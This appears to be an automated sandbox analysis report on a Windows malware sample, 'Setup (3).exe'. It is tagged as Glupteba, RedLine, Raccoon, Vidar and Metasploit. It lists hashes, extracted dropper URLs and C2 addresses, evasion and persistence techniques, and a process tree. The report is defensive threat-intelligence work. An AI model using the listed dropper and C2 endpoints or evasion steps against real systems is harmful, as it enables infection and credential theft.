glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (3).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score

10^/10

glupteba metasploit raccoon redline vidar bratanchikaye d02c5d65069fc7ce1993e7c52edf0c9c4c195c81 norman2 spnewportspectr backdoor dropper evasion infostealer loader stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ia601409.us.archive.org/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/1/fix.txt

Extracted

Family

redline

Botnet

bratanchikAYE

45.14.49.232:63850

Extracted

Family

redline

Botnet

NORMAN2

45.14.49.184:27587

Extracted

Family

redline

Botnet

spnewportspectr

135.148.139.222:1594

Extracted

Family

raccoon

Botnet

d02c5d65069fc7ce1993e7c52edf0c9c4c195c81

Attributes

url4cnc
https://telete.in/open3entershift

rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

resource	yara_rule
behavioral23/memory/1724-406-0x0000000004730000-0x0000000005056000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9048	7548	rundll32.exe	274

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 28 IoCs

resource	yara_rule
behavioral23/files/0x00020000000155ff-156.dat	family_redline
behavioral23/files/0x00020000000155ff-205.dat	family_redline
behavioral23/memory/740-301-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/740-297-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral23/memory/5112-280-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/5112-276-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral23/memory/4876-316-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/5004-320-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/4876-333-0x0000000005620000-0x0000000005C26000-memory.dmp	family_redline
behavioral23/memory/5080-342-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/4560-350-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/5024-364-0x0000000005270000-0x0000000005876000-memory.dmp	family_redline
behavioral23/memory/196-389-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/5140-409-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/196-415-0x0000000005160000-0x0000000005766000-memory.dmp	family_redline
behavioral23/memory/5352-435-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/5308-434-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/5644-465-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/5104-374-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/5024-338-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/5908-480-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/5876-479-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/4608-502-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/5476-505-0x000000000041C5CA-mapping.dmp	family_redline
behavioral23/memory/4952-508-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/6012-527-0x000000000041C5BE-mapping.dmp	family_redline
behavioral23/memory/4780-548-0x000000000041C5EE-mapping.dmp	family_redline
behavioral23/memory/6112-540-0x000000000041C5CA-mapping.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral23/memory/2164-271-0x00000000008D0000-0x00000000009A3000-memory.dmp	family_vidar
behavioral23/memory/2164-272-0x0000000000400000-0x0000000000593000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 28 IoCs

pid	Process
3716	rtXytTCSEPyULbjlSy3NpUb5.exe
3176	LnkZ2AorumdODYrZJZsUX_Xz.exe
2908	TEMtUIL8ULGELrP2KkHRKJmo.exe
3844	sc.exe
1724	KbgnK2Si8dTYTPzZ77fZsXV0.exe
2900	RPc9vbGlkPQzxkV_DqaGs2vb.exe
2164	y33ZOqaPApOoZ98jZpUGwX21.exe
184	5GSvaBFBGNHffIvW4Wn5PFg3.exe
824	od8LFPdJTPowo4RmL2hBf8b0.exe
1036	C_DaOt6CF3eDzLnSX5kmf6cC.exe
1032	DHak7IIGkqqpRKtZvcLSdBEB.exe
4004	ga9C6w445x_E3gCnbvvbBnHR.exe
1060	1YlwFhvu7moCxPYC5u2bgMAd.exe
3880	jsxfqnVRBjTPrrIYjhrfePI3.exe
1028	YilNE5rR7NHpsMBTGNaz06O4.exe
1812	0XEwsiYYZ6u9LJcLYHr1ACa4.exe
3976	6Ll5hxT_BqrnWPKo6C8WDZ1F.exe
4044	Bk10Kb_FJI2mfpl9PHIG9ymN.exe
1692	X8IftiiJu_hVVLheandICplv.exe
1220	sxU18DGPxNelGEbk4Sk8nEP5.exe
2668	y0fbXs28MGG2d_7ba4R53fS_.exe
512	53neRI0L1ONhKJanPgz8Q34f.exe
1440	8RabQwXBy87s8gm0uwOzow0v.exe
1388	Wau3NHZDqJo33Mwi0dYyXtrO.exe
920	Wypf9zCn4_BOvedTpo4Kwuir.exe
4524	8RabQwXBy87s8gm0uwOzow0v.tmp
5096	WerFault.exe
5104	sxU18DGPxNelGEbk4Sk8nEP5.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	y0fbXs28MGG2d_7ba4R53fS_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	y0fbXs28MGG2d_7ba4R53fS_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Wau3NHZDqJo33Mwi0dYyXtrO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Wau3NHZDqJo33Mwi0dYyXtrO.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup (3).exe

Loads dropped DLL 2 IoCs

pid	Process
4524	8RabQwXBy87s8gm0uwOzow0v.tmp
4524	8RabQwXBy87s8gm0uwOzow0v.tmp

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral23/files/0x000100000001ab7f-196.dat	themida
behavioral23/files/0x000100000001ab6c-176.dat	themida
behavioral23/files/0x000100000001ab6c-207.dat	themida
behavioral23/memory/1388-247-0x00000000011D0000-0x00000000011D1000-memory.dmp	themida
behavioral23/memory/2668-235-0x0000000000B80000-0x0000000000B81000-memory.dmp	themida
behavioral23/files/0x000100000001ab7f-172.dat	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	y0fbXs28MGG2d_7ba4R53fS_.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Wau3NHZDqJo33Mwi0dYyXtrO.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	ipinfo.io
29	ipinfo.io
119	ipinfo.io
404	freegeoip.app
8625	ipinfo.io
351	ipinfo.io
112	ip-api.com
120	ipinfo.io
125	ipinfo.io
353	ipinfo.io
369	freegeoip.app
372	freegeoip.app
384	freegeoip.app
6887	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2668	y0fbXs28MGG2d_7ba4R53fS_.exe
1388	Wau3NHZDqJo33Mwi0dYyXtrO.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2900 set thread context of 5112	2900	RPc9vbGlkPQzxkV_DqaGs2vb.exe	112

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	sc.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	sc.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	53neRI0L1ONhKJanPgz8Q34f.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	53neRI0L1ONhKJanPgz8Q34f.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
5432	1060	WerFault.exe	85
5504	3880	WerFault.exe	83
5564	1812	WerFault.exe	82
5740	4044	WerFault.exe	92
6116	1060	WerFault.exe	85
6136	3880	WerFault.exe	83
3188	4044	WerFault.exe	92
5152	1812	WerFault.exe	82
5756	1060	WerFault.exe	85
5764	1812	WerFault.exe	82
5792	1724	WerFault.exe	95
5832	3880	WerFault.exe	83
5636	4608	WerFault.exe	151
6048	3880	WerFault.exe	83
5536	1812	WerFault.exe	82
5564	1060	WerFault.exe	85
5372	1060	WerFault.exe	85
2912	1724	WerFault.exe	95
7152	4044	WerFault.exe	92
4328	4044	WerFault.exe	92
7144	3880	WerFault.exe	83
6472	4044	WerFault.exe	92
6612	3880	WerFault.exe	83
6832	1812	WerFault.exe	82
6876	1812	WerFault.exe	82
7160	1812	WerFault.exe	82
4848	3880	WerFault.exe	83
6360	3880	WerFault.exe	83
6552	1724	WerFault.exe	95
4340	3880	WerFault.exe	83
4968	1724	WerFault.exe	95
4112	6532	WerFault.exe	244
4724	3880	WerFault.exe	83
5272	1724	WerFault.exe	95
4112	1724	WerFault.exe	95
7184	3880	WerFault.exe	83
7908	3880	WerFault.exe	83
7484	3880	WerFault.exe	83
6288	8104	WerFault.exe	283
7000	8052	WerFault.exe	293
6344	1060	WerFault.exe	85
8360	3880	WerFault.exe	83
8428	3880	WerFault.exe	83
8568	1060	WerFault.exe	85
9064	3880	WerFault.exe	83
6992	3880	WerFault.exe	83
7592	5584	WerFault.exe	336
7668	3880	WerFault.exe	83
7888	5584	WerFault.exe	336
5500	3880	WerFault.exe	83
9048	5584	WerFault.exe	336
6968	3880	WerFault.exe	83
6888	5584	WerFault.exe	336
9556	3880	WerFault.exe	83
10180	3880	WerFault.exe	83
9556	3880	WerFault.exe	83
10188	1724	WerFault.exe	95
5096	3880	WerFault.exe	83
9456	5584	WerFault.exe	336
10236	5584	WerFault.exe	336
10024	1724	WerFault.exe	95
10020	5584	WerFault.exe	336
5212	5584	WerFault.exe	336
9208	10180	WerFault.exe	439

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
6964	schtasks.exe
6936	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
10992	timeout.exe
14188	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
7720	taskkill.exe
5640	taskkill.exe
6432	taskkill.exe
4564	taskkill.exe
9484	taskkill.exe
9292	taskkill.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	129	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8552	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
604	Setup (3).exe
604	Setup (3).exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2908	sxU18DGPxNelGEbk4Sk8nEP5.exe
Token: SeDebugPrivilege	920	Wypf9zCn4_BOvedTpo4Kwuir.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4524	8RabQwXBy87s8gm0uwOzow0v.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 604 wrote to memory of 4004	604	Setup (3).exe	87
PID 604 wrote to memory of 4004	604	Setup (3).exe	87
PID 604 wrote to memory of 4004	604	Setup (3).exe	87
PID 604 wrote to memory of 3880	604	Setup (3).exe	83
PID 604 wrote to memory of 3880	604	Setup (3).exe	83
PID 604 wrote to memory of 3880	604	Setup (3).exe	83
PID 604 wrote to memory of 1060	604	Setup (3).exe	85
PID 604 wrote to memory of 1060	604	Setup (3).exe	85
PID 604 wrote to memory of 1060	604	Setup (3).exe	85
PID 604 wrote to memory of 824	604	Setup (3).exe	88
PID 604 wrote to memory of 824	604	Setup (3).exe	88
PID 604 wrote to memory of 824	604	Setup (3).exe	88
PID 604 wrote to memory of 1036	604	Setup (3).exe	89
PID 604 wrote to memory of 1036	604	Setup (3).exe	89
PID 604 wrote to memory of 1036	604	Setup (3).exe	89
PID 604 wrote to memory of 1032	604	Setup (3).exe	90
PID 604 wrote to memory of 1032	604	Setup (3).exe	90
PID 604 wrote to memory of 1032	604	Setup (3).exe	90
PID 604 wrote to memory of 3716	604	Setup (3).exe	102
PID 604 wrote to memory of 3716	604	Setup (3).exe	102
PID 604 wrote to memory of 3716	604	Setup (3).exe	102
PID 604 wrote to memory of 1028	604	Setup (3).exe	84
PID 604 wrote to memory of 1028	604	Setup (3).exe	84
PID 604 wrote to memory of 3976	604	Setup (3).exe	93
PID 604 wrote to memory of 3976	604	Setup (3).exe	93
PID 604 wrote to memory of 1812	604	Setup (3).exe	82
PID 604 wrote to memory of 1812	604	Setup (3).exe	82
PID 604 wrote to memory of 1812	604	Setup (3).exe	82
PID 604 wrote to memory of 1692	604	Setup (3).exe	91
PID 604 wrote to memory of 1692	604	Setup (3).exe	91
PID 604 wrote to memory of 1692	604	Setup (3).exe	91
PID 604 wrote to memory of 4044	604	Setup (3).exe	92
PID 604 wrote to memory of 4044	604	Setup (3).exe	92
PID 604 wrote to memory of 4044	604	Setup (3).exe	92
PID 604 wrote to memory of 1220	604	Setup (3).exe	80
PID 604 wrote to memory of 1220	604	Setup (3).exe	80
PID 604 wrote to memory of 1220	604	Setup (3).exe	80
PID 604 wrote to memory of 2668	604	Setup (3).exe	79
PID 604 wrote to memory of 2668	604	Setup (3).exe	79
PID 604 wrote to memory of 2668	604	Setup (3).exe	79
PID 604 wrote to memory of 512	604	Setup (3).exe	94
PID 604 wrote to memory of 512	604	Setup (3).exe	94
PID 604 wrote to memory of 512	604	Setup (3).exe	94
PID 604 wrote to memory of 2908	604	Setup (3).exe	99
PID 604 wrote to memory of 2908	604	Setup (3).exe	99
PID 604 wrote to memory of 3844	604	Setup (3).exe	169
PID 604 wrote to memory of 3844	604	Setup (3).exe	169
PID 604 wrote to memory of 3844	604	Setup (3).exe	169
PID 604 wrote to memory of 3176	604	Setup (3).exe	101
PID 604 wrote to memory of 3176	604	Setup (3).exe	101
PID 604 wrote to memory of 3176	604	Setup (3).exe	101
PID 604 wrote to memory of 1440	604	Setup (3).exe	81
PID 604 wrote to memory of 1440	604	Setup (3).exe	81
PID 604 wrote to memory of 1440	604	Setup (3).exe	81
PID 604 wrote to memory of 184	604	Setup (3).exe	100
PID 604 wrote to memory of 184	604	Setup (3).exe	100
PID 604 wrote to memory of 184	604	Setup (3).exe	100
PID 604 wrote to memory of 1388	604	Setup (3).exe	78
PID 604 wrote to memory of 1388	604	Setup (3).exe	78
PID 604 wrote to memory of 1388	604	Setup (3).exe	78
PID 604 wrote to memory of 2900	604	Setup (3).exe	97
PID 604 wrote to memory of 2900	604	Setup (3).exe	97
PID 604 wrote to memory of 2900	604	Setup (3).exe	97
PID 604 wrote to memory of 2164	604	Setup (3).exe	96

C:\Users\Admin\AppData\Local\Temp\Setup (3).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (3).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:604
- C:\Users\Admin\Documents\Wau3NHZDqJo33Mwi0dYyXtrO.exe
  "C:\Users\Admin\Documents\Wau3NHZDqJo33Mwi0dYyXtrO.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1388
- C:\Users\Admin\Documents\y0fbXs28MGG2d_7ba4R53fS_.exe
  "C:\Users\Admin\Documents\y0fbXs28MGG2d_7ba4R53fS_.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2668
- C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
  "C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe"
  2⤵
  - Executes dropped EXE
  PID:1220
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5104
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5004
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:2212
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:4560
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    - Executes dropped EXE
    PID:5104
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5140
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5644
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:4608
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 24
      4⤵
      Program crash
      PID:5636
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6012
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:4568
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6044
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6740
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6184
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6608
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6096
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5792
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7112
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6508
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7672
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8036
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7660
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 24
      4⤵
      Program crash
      PID:7000
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6528
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6592
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:208
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8236
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8432
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8676
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8968
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:1908
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8612
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5060
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:1856
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8100
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5796
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8508
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6140
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:5136
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9304
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9620
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9976
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9452
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10128
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9676
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7600
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8620
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10012
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10500
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10912
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10424
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11120
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10876
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11176
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11456
